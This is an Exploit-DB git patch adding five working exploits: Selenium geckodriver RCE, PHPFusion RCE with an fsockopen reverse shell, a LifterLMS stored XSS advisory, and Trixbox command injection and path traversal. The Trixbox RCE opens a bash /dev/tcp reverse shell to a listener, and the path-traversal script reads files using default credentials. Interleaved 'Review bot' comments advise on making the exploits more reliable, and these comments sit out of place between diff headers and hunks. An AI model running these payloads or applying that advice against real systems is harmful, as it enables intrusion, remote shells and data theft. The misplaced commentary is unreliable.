From 26cc1d3fc35c63a19442de55495b636ff75c6d4f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 29 May 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-05-29 5 changes to exploits/shellcodes PHPFusion 9.03.50 - Remote Code Execution WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS) Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated) Trixbox 2.8.0.4 - 'lang' Path Traversal Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) --- exploits/linux/webapps/49915.rb | 79 +++++++++++++++++++++++++++++++++ exploits/php/webapps/49911.py | 50 +++++++++++++++++++++ exploits/php/webapps/49912.txt | 26 +++++++++++ exploits/php/webapps/49913.py | 72 ++++++++++++++++++++++++++++++ exploits/php/webapps/49914.py | 75 +++++++++++++++++++++++++++++++ files_exploits.csv | 5 +++ 6 files changed, 307 insertions(+) create mode 100755 exploits/linux/webapps/49915.rb create mode 100755 exploits/php/webapps/49911.py create mode 100644 exploits/php/webapps/49912.txt create mode 100755 exploits/php/webapps/49913.py create mode 100755 exploits/php/webapps/49914.py diff --git a/exploits/linux/webapps/49915.rb b/exploits/linux/webapps/49915.rb new file mode 100755 index 000000000..f0d59da42 --- /dev/null +++ b/exploits/linux/webapps/49915.rb 
@@ -0,0 +1,79 @@
+# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)
+# Date: 2021-05-27
+# Exploit Author: Jon Stratton
+# Vendor Homepage: https://www.selenium.dev/
+# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar
+# Version: 3.141.59
+# Tested on: Selenium Server 3.141.59, webdriver, geckodriver
+#
+# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb
+#
+# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started.
+#
+# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh”
+#
+# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system.
+#
+# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type.
+
+#!/usr/bin/env ruby
+
+require 'optparse'
+require 'net/http'
+require 'json'
+require 'uri'
+require 'zip'
+require 'base64'
+
+options = {}
+OptionParser.new do |opts|
+  opts.banner = 'Usage: example.rb [options]'
+  opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h|
+    options[:hub] = h
+  end
+  opts.on('--help', 'Prints this help') do
+    puts opts
+    exit
+  end
+end.parse!
+
+hub_url = options[:hub]
+
+payload = 'rm -rf $0
+echo success > /tmp/selenium_node_rce.txt'
+
+# Build profile zip file.
+stringio = Zip::OutputStream::write_buffer do |io|
+  # Create a handler for shell scripts
+  io.put_next_entry("handlers.json")
+  io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
+end
+stringio.rewind
+encoded_profile = Base64.strict_encode64(stringio.sysread)
+
+# Create session with our new profile
+newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}}
+
+uri = URI.parse(hub_url)
+http = Net::HTTP.new(uri.host, uri.port)
+
+# Start session with encoded_profile and save session id for cleanup.
+uri = URI.parse("%s/session" % [hub_url])
+request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
+request.body = JSON.generate(newSession)
+response = http.request(request)
+sessionId = JSON.parse(response.body)["value"]["sessionId"]
+
+# URL.
+data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)]
+uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId])
+request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
+request.body = JSON.generate(:url => data_url)
+response = http.request(request)
+
+# End session(not working)
+uri = URI.parse("%s/session/%s" % [hub_url, sessionId])
+request = Net::HTTP::Delete.new(uri.request_uri)
+http.request(request)
+
+exit
\ No newline at end of file
diff --git a/exploits/php/webapps/49911.py b/exploits/php/webapps/49911.py
new file mode 100755
index 000000000..0d69e99b8
--- /dev/null
+++ b/exploits/php/webapps/49911.py
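Review bot: `sessionId = JSON.parse(response.body)["value"]["sessionId"]` dereferences the hub's reply without checking it, so a rejected session (bad capabilities, no free Firefox node, or a non-JSON error page) dies with a NoMethodError instead of a readable message; guard it, e.g. `abort("session failed: #{response.body}") unless response.is_a?(Net::HTTPSuccess)` followed by `sessionId = JSON.parse(response.body).dig("value", "sessionId") or abort("no sessionId in reply")`. The payload a few lines later is embedded with `Base64.encode64`, which inserts a newline every 60 characters into the data: URL, while the profile above uses `strict_encode64`; use `strict_encode64` for both so the URL stays a single token rather than relying on the browser to strip whitespace. `Net::HTTP.new(uri.host, uri.port)` never sets `use_ssl`, so an https:// hub URL will fail on the first request — add `http.use_ssl = (uri.scheme == 'https')`. The `-hURL` switch also replaces OptionParser's built-in `-h` help, which is presumably why a separate `--help` had to be defined; a comment saying so would save the next reader a puzzle.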
@@ -0,0 +1,50 @@
+# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution
+# Date: 20/05/2021
+# Exploit Author: g0ldm45k
+# Vendor Homepage: https://www.php-fusion.co.uk/home.php
+# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606
+# Version: 9.03.50
+# Tested on: Docker + Debian GNU/Linux 8 (jessie)
+# CVE : CVE-2020-24949
+# Found by: ThienNV
+
+import requests
+import base64
+import argparse
+
+
+PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i <&4 >&4 2>&4\");' " # !!spaces are important in order to avoid ==!!
+REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}"
+
+
+parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 server with "Allow PHP Execution" enabled.')
+parser.add_argument('target', type=str, help='Turn the Allow PHP Execution verification step on or off.')
+parser.add_argument("-v", "--no-verify", action="store_false")
+
+args = parser.parse_args()
+
+if args.target.startswith("http://") or args.target.startswith("https://"):
+    target = args.target
+else:
+    print("[!] Target should start with either http:// or https://")
+    exit()
+
+# verify payload
+PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode('ascii')).decode("ascii")
+if '+' in PAYLOAD_B64 or '=' in PAYLOAD_B64:
+    print("[!] Invalid payload, make sure it does not contain a + or a =!")
+    exit()
+
+# verify vulnerable host
+if args.no_verify:
+    page_data = requests.get(target + "/infusions/downloads/downloads.php?cat_id=${system(ls)}")
+    if "infusion_db.php" not in page_data.text:
+        print("[!] Can't seem to find infusion_db.php. QUITTING!")
+        print("[!] If this validation is wrong just use the --no-verify flag.")
+        exit()
+
+
+# send request
+requests.get(target + REQUEST_PAYLOAD.format(PAYLOAD_B64))
+
+print("[*] Requests send, did you get what you wanted?")
\ No newline at end of file
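Review bot: `PAYLOAD` hard-codes the reverse-shell destination as `fsockopen("127.0.0.1",4444)`, so as committed the injected PHP connects back to the target's own loopback and an operator who does not edit the source gets nothing; the listener belongs in CLI arguments, with the payload built after `parse_args()` and padded to a multiple of three bytes so the base64 form never needs `=` (the current trailing-space trick only works for this one fixed-length string). The help string on the `target` positional ("Turn the Allow PHP Execution verification step on or off.") is the description of the `--no-verify` flag, which itself has none — swap them. Both `requests.get` calls run without a `timeout`, and because the final request stays open for as long as the reverse shell lives, the script will hang in that call until the shell exits; pass `timeout=` and treat `requests.exceptions.ReadTimeout` on the last request as the expected outcome. The `${system(ls)}` probe uses `ls` as a bare PHP constant, whose handling differs across PHP versions, so the verification step deserves a comment saying it was only confirmed against the Debian 8 image named in the header.
```python
parser.add_argument('--lhost', required=True, help='IP the reverse shell connects back to')
parser.add_argument('--lport', type=int, default=4444, help='Port the reverse shell connects back to')
args = parser.parse_args()

# Built after parse_args() so the listener comes from the CLI. Pad with spaces to a
# multiple of 3 bytes so the base64 form never needs '=' (the '+' check below still applies).
PAYLOAD = f"php -r '$sock=fsockopen(\"{args.lhost}\",{args.lport});exec(\"/bin/sh -i <&4 >&4 2>&4\");'"
PAYLOAD += ' ' * (-len(PAYLOAD) % 3)
# … unchanged: target scheme check, base64 '+'/'=' check, host verification …
try:
    requests.get(target + REQUEST_PAYLOAD.format(PAYLOAD_B64), timeout=10)
except requests.exceptions.ReadTimeout:
    pass  # expected: the request only returns once the reverse shell closes
```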
diff --git a/exploits/php/webapps/49912.txt b/exploits/php/webapps/49912.txt
new file mode 100644
index 000000000..e7af8bdff
--- /dev/null
+++ b/exploits/php/webapps/49912.txt
@@ -0,0 +1,26 @@
+# Exploit Title: WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)
+# Date: 2021-05-10
+# Exploit Author: Captain_hook
+# Vendor Homepage: https://lifterlms.com/
+# Software Link: https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
+# Version: LifterLMS < 4.21.1
+# Tested on: ANY
+# CVE : CVE-2021-24308
+
+#Summary:
+
+The 'State' field of the Edit profile page of the LMS by LifterLMS – Online Course, Membership & Learning Management System Plugin for WordPress plugin before 4.21.1 is not properly sanitised when output in the About section of the profile page, leading to a stored Cross-Site Scripting issue. This could allow low privilege users (such as students) to elevate their privilege via an XSS attack when an admin will view their profile.
+
+#Proof_of_Concept:
+
+1- As a Lowest Privilege user go to the edit account page of the LMS
+(e.g https://example.com/my-courses/edit-account/)
+
+2- Put Your XSS payload in State parameter and save your edits, such
+as ">
+
+3- The XSS will be stored and triggered in the about section of the profile: (e.g https://example.com/directory/[user_name]/) (Note): The XSS will also be triggered in the admin dashboard when viewing the user details, for example https://example.com/wp-admin/admin.php?page=llms-reporting&tab=students&stab=information&student_id=2
+
+Refernces:
+
+https://github.com/gocodebox/lifterlms/releases/tag/4.21.0
\ No newline at end of file
diff --git a/exploits/php/webapps/49913.py b/exploits/php/webapps/49913.py
new file mode 100755
index 000000000..c9e26ee21
--- /dev/null
+++ b/exploits/php/webapps/49913.py
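Review bot: Step 2 of the proof of concept ends at `as ">` — the actual XSS payload after the attribute-closing `">` is missing (it looks like an HTML element was stripped somewhere before commit), so the advisory is not reproducible as written; restore whatever tag was used, or at least state it in prose (e.g. "followed by an `<img>` element with an `onerror` handler") so the step is self-contained. The summary claims privilege escalation "when an admin will view their profile", and step 3 supplies the concrete admin page (`admin.php?page=llms-reporting&tab=students&stab=information&student_id=2`); it would strengthen the write-up to say in the summary that the trigger is the reporting tab, which an admin opens as part of normal use, rather than the student's public profile. `Tested on: ANY` should name the WordPress and PHP versions the PoC was actually confirmed on, and `Refernces` should read `References`.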
@@ -0,0 +1,72 @@
+# Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)
+# Date: 27.05.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
+# Credits to: Sachin Wagh
+# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
+# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
+# Version: 2.8.0.4
+# Tested on: Xubuntu 20.04
+# CVE: CVE-2017-14535
+
+'''
+Description:
+trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php
+'''
+
+
+
+'''
+Import required modules:
+'''
+import requests
+import sys
+import time
+
+
+'''
+User-input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+listen_ip = sys.argv[3]
+listen_port = sys.argv[4]
+
+
+'''
+Construct malicious request:
+'''
+# Construct header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1',
+    'Cache-Control': 'max-age=0'
+}
+
+# Construct malicious link:
+link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20'
+link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x'
+link = link_p1 + link_p2
+
+
+'''
+Finish: EXPLOIT!!!
+'''
+print('')
+print('')
+print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port)
+print('')
+time.sleep(2)
+Ready = input("If you're done and want to start the exploit please input EXPLOIT: ")
+if Ready == 'EXPLOIT':
+    print('')
+    print('Exploit sent, check your Netcat instance :)')
+    x = requests.post(link, headers=header)
+else:
+    print('TRY AGAIN')
\ No newline at end of file
diff --git a/exploits/php/webapps/49914.py b/exploits/php/webapps/49914.py
new file mode 100755
index 000000000..3f5a39a84
--- /dev/null
+++ b/exploits/php/webapps/49914.py
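Review bot: The title and header call this "Unauthenticated", but the request sent by `x = requests.post(link, headers=header)` carries `'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ='`, which decodes to `maint:password` — the exploit relies on trixbox's default maintenance credentials, so it should be labelled authenticated (default credentials) and the username/password should be arguments, e.g. `'Authorization': 'Basic ' + base64.b64encode(f'{user}:{password}'.encode()).decode()`, with `import base64` added. The post has no `timeout`, and since the injected `bash -i >& /dev/tcp/...` keeps the HTTP request open for the life of the reverse shell, the script will presumably sit inside `requests.post` until the shell is closed; pass `timeout=` and catch `requests.exceptions.ReadTimeout`, treating it as the expected outcome rather than an error. The `User-Agent` value is doubled (`'User-Agent: Mozilla/5.0 ...'` as the value of the User-Agent header), harmless but odd in server logs. `sys.argv[1]`..`[4]` are read with no usage check, so a missing argument fails with an IndexError instead of a usage line.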
@@ -0,0 +1,75 @@
+# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal
+# Date: 27.05.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
+# Credits to: Sachin Wagh
+# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/
+# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download
+# Version: 2.8.0.4
+# Tested on: Xubuntu 20.04
+# CVE: CVE-2017-14537
+
+'''
+Description:
+trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the
+lang parameter to /maint/modules/home/index.php.
+'''
+
+
+'''
+Import required modules:
+'''
+import requests
+import sys
+import urllib.parse
+
+
+'''
+User-Input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+
+
+'''
+Construct malicious request:
+'''
+# Constructing header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Connection': 'keep-alive',
+    'Cookie': 'template=classic; lng=en; lng=en',
+    'Upgrade-Insecure-Requests': '1',
+    'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=',
+}
+
+# Constructing malicious link (payload):
+base_link = 'http://' + target_ip + ':' + target_port
+base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
+base_link_addon_3 = '%00english'
+print('')
+base_link_addon_2 = input('Input the filepath or input EXIT: ')
+
+
+
+'''
+EXPLOIT:
+'''
+while base_link_addon_2 != 'EXIT':
+    base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='')
+    exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3
+    print('')
+    exploit = requests.post(exploit_link, headers=header)
+    print('Contents of ' + base_link_addon_2 + ':')
+    for data in exploit.iter_lines():
+        data = data.decode('utf-8')
+        if data != '':
+            print(data)
+        else:
+            break
+    print('')
+    base_link_addon_2 = input('Input the filepath or input EXIT: ')
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b5c6ea524..6e88233c8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44074,3 +44074,8 @@ id,file,description,date,author,type,platform,port
 49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
 49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,
 49910,exploits/multiple/webapps/49910.py,"Postbird 0.8.4 - Javascript Injection",2021-05-27,"Debshubra Chakraborty",webapps,multiple,
+49911,exploits/php/webapps/49911.py,"PHPFusion 9.03.50 - Remote Code Execution",2021-05-28,g0ldm45k,webapps,php,
+49912,exploits/php/webapps/49912.txt,"WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)",2021-05-28,Captain_hook,webapps,php,
+49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",2021-05-28,"Ron Jost",webapps,php,
+49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",2021-05-28,"Ron Jost",webapps,php,
+49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",2021-05-28,"Jon Stratton",webapps,linux,
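Review bot: The output loop `for data in exploit.iter_lines(): ... if data != '': print(data) else: break` stops printing at the first empty line, so any file containing a blank line (most `/etc/asterisk/*.conf` and PHP config files) is shown truncated; if the break is meant to cut off the page HTML that follows the included file, say so in a comment, otherwise replace the `else: break` with `continue` or simply `print(exploit.text)` once. The `%00english` suffix depends on null-byte truncation of the include path, which PHP removed in 5.3.4; that matches the PHP shipped with trixbox 2.8 but deserves a comment, since the traversal alone will not read files through a newer interpreter. As in the companion RCE script, the request carries `'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ='` (`maint:password`), i.e. the default maintenance credentials — make them arguments and state the requirement in the header. `requests.post` has no `timeout` and `sys.argv[1]`/`[2]` are read without a usage check.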